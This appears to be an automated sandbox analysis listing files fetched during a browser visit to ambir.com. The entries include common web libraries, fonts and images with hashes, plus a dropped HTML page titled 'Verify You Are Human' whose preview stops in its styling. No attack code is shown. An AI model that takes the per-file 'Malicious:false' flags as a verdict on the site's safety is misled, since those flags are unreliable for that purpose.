                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                              Entropy (8bit):3.0995623739536313
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:CUnl/72vl/JtSle:/0B4le
                                                                                                                                                                                              MD5:C9FD1CFBCA9F678ED068ED6B4BBEB666
                                                                                                                                                                                              SHA1:C0AF0ABB2CB4703D1515F75044CC872423C3B0D3
                                                                                                                                                                                              SHA-256:5C390BB4424108C7804361C9B49CB8FBCEF0AAB2A412F87C0A8A5F016E35A98F
                                                                                                                                                                                              SHA-512:5D9F64400A09CAD7B9F8B588227D7F4C592F52E00EC08A6718BE21D5262FDF2D46056EF7CF07412E1D9DA70FED075EDDDA0A7CB8E49AC4C50706339C2696D57B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-includes/images/blank.gif
                                                                                                                                                                                              Preview:GIF89a.............!.......,........@..D..;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 24 x 24
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):3322
                                                                                                                                                                                              Entropy (8bit):7.21453501645913
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:HLAAgsXUTPwkYKrfO3kIH7PSeFUhOIM5GPmCM1UqKZkk0Nra:HLAAglT5IHOeFWN4GerDhk0Nra
                                                                                                                                                                                              MD5:79DE1B954774690FFF0E7345D82FAA25
                                                                                                                                                                                              SHA1:0B53F6EA9DC1A0AC7014013D0EB433878AAB1B7C
                                                                                                                                                                                              SHA-256:A7F44D3BC98F7B02879478758A8D3903EF51D1292F6B3A4FDAAD1DF616CB63CA
                                                                                                                                                                                              SHA-512:93D2688568013DED71064844A534E2DCB90DB594B34DE37645BBE19802B329E3D4AD11F0BC23AFD5884EAA0EC8FDF9C3D3E6BC0D2CC1AAAD1D43FB3EAF4E36F8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/images/loader.79de1b954774690fff0e7345d82faa25.gif
                                                                                                                                                                                              Preview:GIF89a................444===MMMUUUVVVYYYaaaggghhhlll|||.............................................................................................!!!''')))555BBBNNNTTT]]]jjjttt{{{....................................................................................666999???iiinnn}}}.............................................###OOORRRmmm.......................................<<<@@@..........................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.-Made by Krasimira Nejcheva (www.loadinfo.net).!.....+.,.............pH.A #.rI,...B..T.-P..J<=.......0.T.3.*!.8cuB.......hDJ*.q..&+(..(+*.~..K...nJ.}.!K$....L).. .D*'.\.K&....B*$#)+$..........).....
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (32033)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):37045
                                                                                                                                                                                              Entropy (8bit):5.174934618594778
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
                                                                                                                                                                                              MD5:5869C96CC8F19086AEE625D670D741F9
                                                                                                                                                                                              SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                                                                                                                                                                                              SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                                                                                                                                                                                              SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js
                                                                                                                                                                                              Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):23993
                                                                                                                                                                                              Entropy (8bit):5.4678174127744095
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:E6Q0wQ9xlqY4TaqqY4F5hKZ22EANOA1uCrDfjUdb0Fqzzl:DOqNX+qvKZ7EAN31uaDfjwb0Ezzl
                                                                                                                                                                                              MD5:E2BFA0B7FE2AFB381F1DCB549F8EAFE4
                                                                                                                                                                                              SHA1:2845D4512A51F3875F30ED0AC64FE2B503411255
                                                                                                                                                                                              SHA-256:5EDE241AEA04B443645BF60949B347E94B2DF6A177075F2503971E62428A9E54
                                                                                                                                                                                              SHA-512:33B21F567686F55CAAF173F6717A2FEC8787CFA725410004DBD3F28447FD8EFFF0D79C2D67D56664C0A9CCC6B1C15598D4CFD61B82168C3D72C94CDAF4588934
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.googleapis.com/css2?family=Comfortaa:wght@400;700&family=Open+Sans:wght@400;700&family=Roboto:wght@300;400;700&display=swap
                                                                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Comfortaa';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/comfortaa/v45/1PtCg8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMXL830efAesmwYSFoxBEC_I2udQ.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Comfortaa';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/comfortaa/v45/1PtCg8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMXL830efAesmwYSFoxBEL_I2udQ.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek */.@font-face {. font-family: 'Comfortaa';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/comfortaa/v45/1PtCg8LJRfWJmhDAuUsSQamb1W0lwk4S4WjMXL830efAesmwYSFoxBEM_I2udQ.woff2) format('woff2');. unicode-range: U+0370-0377, U+037A-037F, U+0384-038
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):18160
                                                                                                                                                                                              Entropy (8bit):7.9507935414647015
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
                                                                                                                                                                                              MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                                                                                                              SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                                                                                                              SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                                                                                                              SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
                                                                                                                                                                                              Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):164
                                                                                                                                                                                              Entropy (8bit):6.692560236167113
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:u1Zr1l/KiISAXY2jwYFwiPeYVldCtvWPDUDmFmp2CtfzG69I1sDn:u1ZeiH8nwMeYVlA1qFmp2CtLG62sDn
                                                                                                                                                                                              MD5:C4D928D9876E9D387F82FB9D9B887B5A
                                                                                                                                                                                              SHA1:2D8DBC43165916AF0EBC688572BFD7ECE8E2CEB3
                                                                                                                                                                                              SHA-256:56BFEAA5F75E87E8530484EDE8E12C54ED374F9FBEC48FF0BD9E20E3CAB4950C
                                                                                                                                                                                              SHA-512:0401DFE4A21BC303C1DB5EEA9B07CB4754E4CA34FFE55B50AADB3BEE5D468F5B4948407F6198632E2FE8BA6707543E38231891FA0675CB0609384E3167A81722
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/images/search.png
                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../.....0f....F....o...........F..i.@...?].2...O..[t.&..B.Z'....(.xg:.f..6......~~Ko.5..J...+./.~S....'g`.l.sRvH...y%..X.6$....9.....6......&
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):305
                                                                                                                                                                                              Entropy (8bit):6.706458991284671
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:6v/lhPUWpAYfvlp3preikIMBRdjXWKQcJzbNQEa/jqp:6v/7PVpKiLMXNXWKHY7A
                                                                                                                                                                                              MD5:7456EA85833AB76FD0D3BC82C44BE116
                                                                                                                                                                                              SHA1:8DFA9F8F14D1E4045CCC6051BB0BBB8B1E91CED9
                                                                                                                                                                                              SHA-256:E0FECE1C0B8BD348F826B5BAD4486AA4245A55F3A594E765EE7909755C4906A1
                                                                                                                                                                                              SHA-512:4F7B4FB0606E60137AC5F8232A580EF2DBACB96E7A02D7F94538F49F9634609E32BE20B0D2462220B66A24FDF1B0606B0CE50FDD45D63CD8E480350B355C6011
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.PNG........IHDR.................... cHRM..z%..............u0...`..:....o._.F....IDATx..... .E3BF`...Q8.... +x....=..#...?|$.a...."...|X~......dPI........$.H..V...QP)u...M..m...g..&.q. k.B.3.}.mT. Yo.....(t....FP.BO...C+..Q9H.-^.........]..,.o....;.}.f..^.UA..LK)....Q(R.........h.Ue.....IEND.B`.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (44072)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):92350
                                                                                                                                                                                              Entropy (8bit):5.2602691140833295
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:qWldTRdBLRkRzmVxc2E1mfVRyEAzBc5tTSebsvWkAUpYj5USXLfCBI7qfwqjEvN4:fY03u8jbxw/n9
                                                                                                                                                                                              MD5:84BE5E4A56F0509997F3A20CA83DB5BD
                                                                                                                                                                                              SHA1:C25B420660A9752DBE1FD84D7A0B28F37C9F3BCA
                                                                                                                                                                                              SHA-256:09F2ADA859F867D2D649B075D84E9051B5A8C081CD1B24FF21C7C1F4F1D4276F
                                                                                                                                                                                              SHA-512:281306932635AC0CC21ACD681D00400E8D1EA84119367BC22E0202470EB257DB2B384E7D94E278026FF96CCC5D9D9DD50E824CC5FD8E3241FDE3F8C583851DD4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape",
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (44072)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):92350
                                                                                                                                                                                              Entropy (8bit):5.2602691140833295
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:qWldTRdBLRkRzmVxc2E1mfVRyEAzBc5tTSebsvWkAUpYj5USXLfCBI7qfwqjEvN4:fY03u8jbxw/n9
                                                                                                                                                                                              MD5:84BE5E4A56F0509997F3A20CA83DB5BD
                                                                                                                                                                                              SHA1:C25B420660A9752DBE1FD84D7A0B28F37C9F3BCA
                                                                                                                                                                                              SHA-256:09F2ADA859F867D2D649B075D84E9051B5A8C081CD1B24FF21C7C1F4F1D4276F
                                                                                                                                                                                              SHA-512:281306932635AC0CC21ACD681D00400E8D1EA84119367BC22E0202470EB257DB2B384E7D94E278026FF96CCC5D9D9DD50E824CC5FD8E3241FDE3F8C583851DD4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-9eda13b5.min.js
                                                                                                                                                                                              Preview:.var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape",
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Ogg data, Vorbis audio, stereo, 44100 Hz, ~112000 bps
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):10805
                                                                                                                                                                                              Entropy (8bit):7.463879436504817
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:oFDJo+OFStS1iImi4C+jk+Ww5tssYV66NR46hF4:opi+OoS4ChukoYV66NR5X4
                                                                                                                                                                                              MD5:C2F30966CECC84904886555E1C5B549C
                                                                                                                                                                                              SHA1:4C7000255DCAA26B50CF7F02C0251A566842A2ED
                                                                                                                                                                                              SHA-256:B1FA55944D393C97B9D9C938E639E532E95CCB046440B9ADFFFCA4E1B0A2BCAE
                                                                                                                                                                                              SHA-512:BB8B7A0ACEEF29DCB50453BC997B208476ECAE5867503104E4544D65A0E6FD15A19F427A242C4826F5DEC3F391B26B6A5E81C447FBF35B4D1CBA421EAC53C3F3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient/sounds/olark-chimes.ogg:2f85f447b0ac8c:0
                                                                                                                                                                                              Preview:OggS..........F.......X1^....vorbis.....D.................OggS..........F.......2.|..@.................vorbis....Lavf57.57.100........encoder=Lavc57.65.100 libvorbis..vorbis%BCV..@..$s.*F.s....BP...B.k..BL...2L[.%s.!..B.[(..U..@...Ax...A.!.%=X..'=.!..9x..iA.!..B.!..B.!.E9h..'A....08...8...E9X..'A. ..B....9.!.$5HP..9....,(...0....5(...0...B...I5...gAx..iA.!.$AH...A...FAX...9....A...*9... 4d.......(..(..........@Q..q........Y.........H..H..H.$Y.%Y.%Y..,.,.,.2.....H..PQ.Eq....Y..d....8..X..h...............4CS<G.D.TU.m.m.m.m.m[.e...Y..@....if...0...BCV........0..U..@....J....9..Y..J.9..H.y....9.s...1.9..Y....9..Y....9.'.y.*.9.q..`...9.&.y....9...i..K.9.H.yR.K.9.s.9.s.9........9.......9.O.....9.s.9.s.9. 4d.....@...a.)...h F.b.2.A..0....B...h..:.%.qRJ'..Y.....@.!..RH!..RH!..b.!..r.)...J*....2.,..2.,..:..;.1..C+..RSm5.Xk.9..VZk..RJ)..R.BCV.. ...B..d.QH!..b.)..r.*...U.. ......O...................%Q.%Q.-.25.SEUue.uY.}[.].}..}..uaX.eY.eY.eY.eY.eY.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 16056, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):16056
                                                                                                                                                                                              Entropy (8bit):7.987220906878101
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:ruNZ9ZmT0BTzxm/JNYDC24turMNdP6R8yctInbr5muCjK9LduSApfg5D:r2ZpVzxgiC5s4bPJyctInbrQu6KhTA2
                                                                                                                                                                                              MD5:175853DED2A4E2249D37C46CA0CA33C5
                                                                                                                                                                                              SHA1:2C0811523C15070ED822CD89AEDE5DCB77060FC3
                                                                                                                                                                                              SHA-256:4A9F53C02752E79270686F1B2A3616B86D3AF1EA2A288F2977E34B1141D552EC
                                                                                                                                                                                              SHA-512:BAC0BC2B9426B93B91FD502F788868FAE10894B610844B09F7C8E6D24521118A138E411F1D03437A2015A84FC7146370E4B6FD8AB68CBC6F157643BC31CCA98B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient/fonts/noto-sans-v11-latin-regular.woff2
                                                                                                                                                                                              Preview:wOF2......>.......w...>X.........................j..D.2.`.....~..4...........V..6.$..(. .... .....g5l.6..UE+4.j$.F.Rp......-K....2...W.G....h.....Y.`..Q.e....6...!z...L.~.^.q..#..V..}..-.]d.)....D.v.......?Q.V.]8.?...Lq........Or...lfH.Yg=-.e..P...h.@..B..A...l.3.R..izb_...<....oo..L2Kk.i.B84.V5n.Z.QX............!C...I./.B&....._.wo..|U..7..d.e....@./b.....O.Y";^..A6....^.l.%.5...*..d.?...fC>......i...i.<lxX.;..8..:]W\..9...S;.=z..gl....c.....;.x.[_.f.Hz....._..]...........-.................U.E...._q......_.j-f..R.....lC.?....r......I..$.....*.`*..;w..{#Y`.HNv$.Y..0VH.8#...| ........s.-.q>.t..Q.TnQt..n.<O.)?....&...........P..V.;_..w...<f.c....U4.<,..~o.s...I%DQ....6-Mc._K#.!.8.mN.^..S...M.a.].........!....,.=/...b.F..>..$..N.,c.JJ.2+`.....x.C.G....B.;.f..dQq..N...OI.h .=8%.h..t5r..g#......P...!." ..w.............a..49..%.6=U.5f..."...I.Z..j.uH j....|....G.M<{3..(....."..&H...O...........(...0..`.0._.i...g.[.,.......m.......Y._.7....#eI)i.........-X..
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65446)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):101137
                                                                                                                                                                                              Entropy (8bit):5.27541305305053
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:cRUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKvrP7Qo:kHNwcv9VBQpLl88SMBQ47GKvrPU+J
                                                                                                                                                                                              MD5:5A00D38CA73C549B9C11D4317D746F34
                                                                                                                                                                                              SHA1:EC9183923C49B6439CEF103F60CD0D69DA023830
                                                                                                                                                                                              SHA-256:732B75262F6C9B6D5A61DA968E653880646B58CC1B25387B32BADBE03881DFE1
                                                                                                                                                                                              SHA-512:96DCB1608066578F90D8EAE23734A1D13C2CE30AD2804494538410CA5C765BC04548CBBE7F947A0E3DBEA9BE902345048A9887F7841CAC7EA062C574BC0881EF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:./*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remov
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (7428), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):7428
                                                                                                                                                                                              Entropy (8bit):4.644404804089283
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:PjHXN5HjRHJNnHKDHJXHasHyBj8nHBH8bNbHTUqrmni4ElJK6XKUlK5859lP5IQl:PTdtjVTHKzJXawyBElebiapGAHNJ
                                                                                                                                                                                              MD5:A2C559609EF64774958B8AC1C864937D
                                                                                                                                                                                              SHA1:F80657FB2FCC51C54D695CFD87FB2799CFE3A239
                                                                                                                                                                                              SHA-256:E8EF949E6EB17E0A5F163638EDB953F57A5992B3D118AE5493F31FB591E09544
                                                                                                                                                                                              SHA-512:95FE4A93986A10A057FB6CDC9EBB099A059725E2D5D929D1ADF2E50CFF4665B6320D018835A53E68B1B3A37F94707801C6AD549DAF023C26D68C41C26C6346E7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-ee83140b.min.css
                                                                                                                                                                                              Preview::root{--woocommerce:#7F54B3;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#7F54B3;--wc-primary-text:white;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#b3af54;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}.woocommerce table.shop_table_responsive thead,.woocommerce-page table.shop_table_responsive thead{display:none}.woocommerce table.shop_table_responsive tbody tr:first-child td:first-child,.woocommerce-page table.shop_table_responsive tbody tr:first-child td:first-child{border-top:0}.woocommerce table.shop_table_responsive tbody th,.woocommerce-page table.shop_table_responsive tbody th{display:none}.woocommerce table.shop_table_responsive tr,.woocommerce-page table.shop_table_responsive tr{display:block}.woocommerce table.shop_table_responsive tr td,.woocommerce-page table.shop_table_responsive tr td{display:block;text-align:right!important}.woocommerce table.shop_table_responsive tr td.order-actions,.wooc
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (542), with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):15754
                                                                                                                                                                                              Entropy (8bit):4.79476680649664
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:XvOUZFAp1ZBDbT/fYi/8H3gGSIe11mPAaNeexdwiAwdBG4nRvqPt5BZmHoBi5s3X:X6edHvS2HoBi5s3isQs
                                                                                                                                                                                              MD5:6F0BEF4C73D66AC474E06A7291219B01
                                                                                                                                                                                              SHA1:E1651A5BC90FBB742B1F6555E2EE1BF80182CC45
                                                                                                                                                                                              SHA-256:D89A755C25439ED6BCBD49C79D064EAF1746A3AEBCD59B0C91F60582AF84714A
                                                                                                                                                                                              SHA-512:F76CEB4A40B35A6980378DF84ED8D7BA06C9969C7E30C686AF93A692FF45CADD62BC60DF09B0F895D948AA935BEA9E424D5043881D25E5E52B08A5340C520F05
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: ..<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Verify You Are Human</title>.. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">.. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.0/css/all.css">.. <link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet' type='text/css'>.. <style>... ... body, html {.. margin: 0;.. padding: 0;.. width: 100%;.. height: 100%;.. display: flex;.. justify-content: center;.. align-items: center;.. font-family: 'Roboto', sans-serif;.....font-style:normal;.....font-weight:400;.. background: #f2f2f2;.. color: #333;.....font-size:14px;.. }.... .xT-fde-85495406 {.. text-align: cente
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (56580), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):56582
                                                                                                                                                                                              Entropy (8bit):5.306717396400424
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:MeExXUhrnxDjoaaZxk2V4c08ksQf46iU3j8cOu6ETO/rBqUy:MtQfiU3jcDHy
                                                                                                                                                                                              MD5:85AA47F767A5917D4FF259A5AAA63236
                                                                                                                                                                                              SHA1:0BB949AC61240D7BC235613DFDC1A86E73676005
                                                                                                                                                                                              SHA-256:F9D6761598148A8CB23E42B1B6EC84939C16664855FD4C013191D43701F942E6
                                                                                                                                                                                              SHA-512:35926BF83EC50E941EBB390383266E2E4713B81601ECF34925CF0E8E1F794C5A87F505D8344995DAF63DCB000CE38E003F24E117AEA3C58FD773B995A1B21BB2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/js/formstplivejs.5598e1e583c1d09fc270b76b7bc87fed.js
